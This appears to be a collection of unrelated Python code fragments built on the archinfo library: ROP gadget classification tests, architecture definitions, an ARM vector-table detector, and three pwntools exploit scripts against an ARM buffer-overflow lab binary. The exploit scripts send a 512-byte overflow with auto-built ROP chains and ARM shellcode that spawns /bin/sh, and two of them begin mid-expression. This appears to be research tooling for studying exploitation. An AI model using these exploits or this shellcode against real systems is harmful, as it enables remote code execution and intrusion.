def not_test_arm(self): tests = [ ({ LoadMem: 1 }, '\x08\x80\xbd\xe8'), # pop {r3, pc} ({ MoveReg: 1 }, '\x02\x00\xa0\xe1\x04\xf0\x9d\xe4'), # mov r0, r2; pop {pc} ({ LoadMem: 7, LoadMultiple: 1 }, '\xf0\x87\xbd\xe8'), # pop {r4, r5, r6, r7, r8, r9, sl, pc} ( { LoadMem: 3, LoadMultiple: 1 }, '\x04\xe0\x9d\xe5\x08\xd0\x8d\xe2' # ldr lr, [sp, #4]; add sp, sp, #8 + '\x0c\x00\xbd\xe8\x1e\xff\x2f\xe1'), # pop {r2, r3}; bx lr ({ LoadMemJump: 6, RegJumpNormal: 1 }, '\x1f\x40\xbd\xe8\x1c\xff\x2f\xe1' ), # pop {r0, r1, r2, r3, r4, lr}; bx r12 ({ LoadMemJump: 1, RegJumpNormal: 1 }, '\x04\xe0\x9d\xe4\x13\xff\x2f\xe1'), # pop {lr}; bx r3 ] #self.run_test(archinfo.ArchARM(), tests[2::1]) arch = archinfo.ArchARM() self.run_test(arch, tests)
def __init__(self, endianess=Endianess.LITTLE): super(ArchitectureArm,self).__init__(CS_ARCH_ARM, CS_MODE_ARM, 4, 4, endianess) self._searcher = SearcherARM() self._name = 'ARM' if 'archinfo' in globals(): self._info = archinfo.ArchARM() if 'keystone' in globals(): self._ksarch = (keystone.KS_ARCH_ARM, keystone.KS_MODE_ARM)
def __init__(self): super(ArchitectureArmThumb, self).__init__(CS_ARCH_ARM, CS_MODE_THUMB, 4, 2) self._searcher = SearcherARM() self._name = 'ARMTHUMB' self._maxInvalid = 2 if 'archinfo' in globals(): self._info = archinfo.ArchARM() if 'keystone' in globals(): self._ksarch = (keystone.KS_ARCH_ARM, keystone.KS_MODE_THUMB)
def not_test_arm_jcc(self): tests = [ ({ RegJumpNormal: 2, JCC: 1 }, '\x00\x00S\xe3\x00\x00\x00\n\x13\xff/\xe1\x1e\xff/\xe1'), ({ RegJumpNormal: 1 }, '\x13\xff\x2f\xe1'), # bx r3 #({RegJumpNormal:2, JCC:1}, '\x03\xb1\x18\x47\x70\x47'), #cbz r3, 10394 <register_tm_clones+0x28>; bx r3; bx lr ] #self.run_test(archinfo.ArchARM(), tests[2::1]) arch = archinfo.ArchARM() self.run_jcc_test(arch, tests)
def constructIR(binaryInst, address, arc="x86", endness="LE"): ar = archinfo.ArchX86() if arc == "x86": ar = archinfo.ArchX86() elif arc == "mips32": if endness == "LE": ar = archinfo.ArchMIPS32(archinfo.Endness.LE) else: ar = archinfo.ArchMIPS32(archinfo.Endness.BE) elif arc == "arm": ar = archinfo.ArchARM(archinfo.Endness.LE) irsb = pyvex.IRSB(data=binaryInst, mem_addr=address, arch=ar) stmts = irsb.statements irsb.pp() return stmts, irsb.jumpkind, irsb.next
def detect_arm_ivt(stream): """ :param stream: :type stream: file :return: """ min_arm_sp = 0x20000000 max_arm_sp = 0x20100000 # TODO: We're just looking at the front for now try: maybe_sp = stream.read(4) maybe_le_sp = struct.unpack('<I', maybe_sp)[0] maybe_be_sp = struct.unpack(">I", maybe_sp)[0] if min_arm_sp < maybe_le_sp < max_arm_sp: maybe_arch = archinfo.ArchARMEL(endness=archinfo.Endness.LE) l.debug( "Found possible Little-Endian ARM IVT with initial SP %#08x" % maybe_le_sp) maybe_entry = struct.unpack('<I', stream.read(4))[0] l.debug("Reset vector at %#08x" % maybe_entry) maybe_base = maybe_entry & 0xffff0000 # A complete guess l.debug("Guessing base address at %#08x" % maybe_base) return maybe_arch, maybe_base, maybe_entry elif min_arm_sp < maybe_be_sp < max_arm_sp: maybe_arch = archinfo.ArchARM(endness=archinfo.Endness.BE) l.debug("Found possible Big-Endian ARM IVT with initial SP %#08x" % maybe_be_sp) maybe_entry = struct.unpack('>I', stream.read(4))[0] l.debug("Reset vector at %#08x" % maybe_entry) maybe_base = maybe_entry & 0xffff0000 # A complete guess l.debug("Guessing base address at %#08x" % maybe_base) return maybe_arch, maybe_base, maybe_entry else: # Nope return (None, None, None) except: l.exception("Something died") return (None, None, None) finally: stream.seek(0)
def test_arm(self): arch = archinfo.ArchARM() tests = [ (['\x08\x80\xbd\xe8'], LoadMem, ['sp'], ['r3'], [0], [], 0x8, 4, True), # pop {r3, pc} (['\x02\x00\xa0\xe1\x04\xf0\x9d\xe4'], MoveReg, ['r2'], ['r0'], [0], [], 4, 0, True), # mov r0, r2; pop {pc} (['\xf0\x87\xbd\xe8'], LoadMem, ['sp'], ['r4'], [0x00], ['r5', 'r6', 'r7', 'r8', 'r9', 'r10' ], 0x20, 0x1c, True), # pop {r4, r5, r6, r7, r8, r9, sl, pc} (['\xf0\x87\xbd\xe8'], LoadMem, ['sp'], ['r5'], [0x04], ['r4', 'r6', 'r7', 'r8', 'r9', 'r10' ], 0x20, 0x1c, True), # pop {r4, r5, r6, r7, r8, r9, sl, pc} (['\xf0\x87\xbd\xe8'], LoadMem, ['sp'], ['r6'], [0x08], ['r5', 'r4', 'r7', 'r8', 'r9', 'r10' ], 0x20, 0x1c, True), # pop {r4, r5, r6, r7, r8, r9, sl, pc} (['\xf0\x87\xbd\xe8'], LoadMem, ['sp'], ['r7'], [0x0c], ['r5', 'r6', 'r4', 'r8', 'r9', 'r10' ], 0x20, 0x1c, True), # pop {r4, r5, r6, r7, r8, r9, sl, pc} (['\xf0\x87\xbd\xe8'], LoadMem, ['sp'], ['r8'], [0x10], ['r5', 'r6', 'r7', 'r4', 'r9', 'r10' ], 0x20, 0x1c, True), # pop {r4, r5, r6, r7, r8, r9, sl, pc} (['\xf0\x87\xbd\xe8'], LoadMem, ['sp'], ['r9'], [0x14], ['r5', 'r6', 'r7', 'r8', 'r4', 'r10' ], 0x20, 0x1c, True), # pop {r4, r5, r6, r7, r8, r9, sl, pc} (['\xf0\x87\xbd\xe8'], LoadMem, ['sp'], ['r10'], [0x18], ['r5', 'r6', 'r7', 'r8', 'r9', 'r4'], 0x20, 0x1c, True), # pop {r4, r5, r6, r7, r8, r9, sl, pc} (['\xf0\x87\xbd\xe8'], LoadMultiple, ['sp'], ['r4', 'r5', 'r6', 'r7', 'r8', 'r9', 'r10'], [0, 4, 8, 0xc, 0x10, 0x14, 0x18], [], 0x20, 0x1c, True), # pop {r4, r5, r6, r7, r8, r9, sl, pc} ( [ '\x04\xe0\x9d\xe5\x08\xd0\x8d\xe2\x0c\x00\xbd\xe8\x1e\xff\x2f\xe1' ], # ldr lr, [sp, #4]; add sp, sp, #8; pop {r2, r3}; bx lr LoadMem, ['sp'], ['r2'], [0x8], ['lr', 'r3'], 0x10, 4, True), ( [ '\x04\xe0\x9d\xe5\x08\xd0\x8d\xe2\x0c\x00\xbd\xe8\x1e\xff\x2f\xe1' ], # ldr lr, [sp, #4]; add sp, sp, #8; pop {r2, r3}; bx lr LoadMem, ['sp'], ['r3'], [0xc], ['lr', 'r2'], 0x10, 4, True), (['\x1f\x40\xbd\xe8\x1c\xff\x2f\xe1'], LoadMemJump, ['sp', 'r12'], ['r0'], [0], ['lr', 'r1', 'r2', 'r3', 'r4'], 0x18, None, True), # pop {r0, r1, r2, r3, r4, lr}; bx r12 (['\x1f\x40\xbd\xe8\x1c\xff\x2f\xe1'], LoadMemJump, ['sp', 'r12'], ['r1'], [4], ['lr', 'r0', 'r2', 'r3', 'r4'], 0x18, None, True), # pop {r0, r1, r2, r3, r4, lr}; bx r12 (['\x1f\x40\xbd\xe8\x1c\xff\x2f\xe1'], LoadMemJump, ['sp', 'r12'], ['r2'], [8], ['lr', 'r1', 'r0', 'r3', 'r4'], 0x18, None, True), # pop {r0, r1, r2, r3, r4, lr}; bx r12 (['\x1f\x40\xbd\xe8\x1c\xff\x2f\xe1'], LoadMemJump, ['sp', 'r12'], ['r3'], [0xc], ['lr', 'r1', 'r2', 'r0', 'r4'], 0x18, None, True), # pop {r0, r1, r2, r3, r4, lr}; bx r12 (['\x1f\x40\xbd\xe8\x1c\xff\x2f\xe1'], LoadMemJump, ['sp', 'r12'], ['r4'], [0x10], ['lr', 'r1', 'r2', 'r3', 'r0'], 0x18, None, True), # pop {r0, r1, r2, r3, r4, lr}; bx r12 (['\x1f\x40\xbd\xe8\x1c\xff\x2f\xe1'], LoadMemJump, ['sp', 'r12'], ['lr'], [0x14], ['r0', 'r1', 'r2', 'r3', 'r4'], 0x18, None, True), # pop {r0, r1, r2, r3, r4, lr}; bx r12 (['\x1f\x40\xbd\xe8\x1c\xff\x2f\xe1'], Jump, ['r12'], ['pc'], [0], ['lr', 'r0', 'r1', 'r2', 'r3', 'r4'], 0x18, None, True), # pop {r0, r1, r2, r3, r4, lr}; bx r12 (['\x04\xe0\x9d\xe4\x13\xff\x2f\xe1'], LoadMemJump, ['sp', 'r3'], ['lr'], [0], [], 0x4, None, True), # pop {lr}; bx r3 (['\x04\xe0\x9d\xe4\x13\xff\x2f\xe1'], Jump, ['r3'], ['pc'], [0], [], 0x4, None, True), # pop {lr}; bx r3 # Negative tests (['\x04\xe0\x9d\xe4\x13\xff\x2f\xe1'], Jump, ['r3'], ['pc'], [0], [], 0x8, None, False), # pop {lr}; bx r3 (bad stack offset) (['\x02\x00\xa0\xe1\x04\xf0\x9d\xe4' ], MoveReg, ['r2'], ['r0'], [0], [], 4, 4, False), # mov r0, r2; pop {pc} (bad ip in stack offset) (['\xf0\x87\xbd\xe8'], LoadMem, ['sp'], ['r4'], [0x04], ['r5', 'r6', 'r7', 'r8', 'r9', 'r10'], 0x20, 0x1c, False), # pop {r4, r5, r6, r7, r8, r9, sl, pc} (bad param) (['\xf0\x87\xbd\xe8'], LoadMultiple, ['sp'], ['r4', 'r5', 'r6', 'r7', 'r8', 'r9', 'r10'], [0, 4, 7, 0xc, 0x10, 0x14, 0x18], [], 0x20, 0x1c, False), # pop {r4, r5, r6, r7, r8, r9, sl, pc} (bad param) ] self.run_test(arch, tests)
import sys, logging import archinfo from pwn import * from rop_compiler import ropme filename = './arm_bof_execve' p = remote('localhost', 2222) print "Using automatically built ROP chain" files = [(filename, None, 0)] goals = [["function", "dup2", 4, 0], ["function", "dup2", 4, 1], ["function", "dup2", 4, 2], ["execve", "/bin/sh"]] rop = ropme.rop(files, [], goals, archinfo.ArchARM(), log_level=logging.DEBUG) payload = 'A' * 512 + 'B' * 4 + rop payload += ((700 - len(payload)) * 'B') payload += "JEFF" # To end our input with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) p.writeline(payload) p.interactive()
+ "\x0c\x30" # adds r0, #12 + "\x01\x90" # str r0, [sp, #4] + "\x01\xa9" # add r1, sp, #4 + "\x92\x1a" # subs r2, r2, r2 + "\x02\x92" # str r2, [sp, #8] + "\x0b\x27" # movs r7, #11 + "\x01\xdf" # svc 1 + "//bin/sh" # program to execute + "\x00" # NULL to end the string ) target_address = buffer_address + 700 print "shellcode ({} bytes) address: 0x{:x}".format(len(shellcode), target_address) print "Using automatically built ROP chain" rop = ropme.rop_to_shellcode([(filename, None, 0), (libc, libc_gadget_file, libc_address)], [libc], target_address, archinfo.ArchARM(), logging.DEBUG) payload = 'A' * 512 + 'B' * 4 + rop payload += ((700 - len(payload)) * 'B') + shellcode payload += "JEFF" # To end our input with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) p.writeline(payload) p.interactive()
+ "\x78\x46" # mov r0, pc + "\x0c\x30" # adds r0, #12 + "\x01\x90" # str r0, [sp, #4] + "\x01\xa9" # add r1, sp, #4 + "\x92\x1a" # subs r2, r2, r2 + "\x02\x92" # str r2, [sp, #8] + "\x0b\x27" # movs r7, #11 + "\x01\xdf" # svc 1 + "//bin/sh" # program to execute + "\x00" # NULL to end the string ) target_address = buffer_address + 700 print "shellcode ({} bytes) address: 0x{:x}".format(len(shellcode), target_address) print "Using automatically built ROP chain" rop = ropme.rop_to_shellcode([(filename, None, 0)], [], target_address, archinfo.ArchARM(), logging.DEBUG) payload = 'A' * 512 + 'B' * 4 + rop payload += ((700 - len(payload)) * 'B') + shellcode payload += "JEFF" # To end our input with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) p.writeline(payload) p.interactive()
def skip_test_arm(self): arch = archinfo.ArchARM() tests = [ ] self.run_test(arch, tests)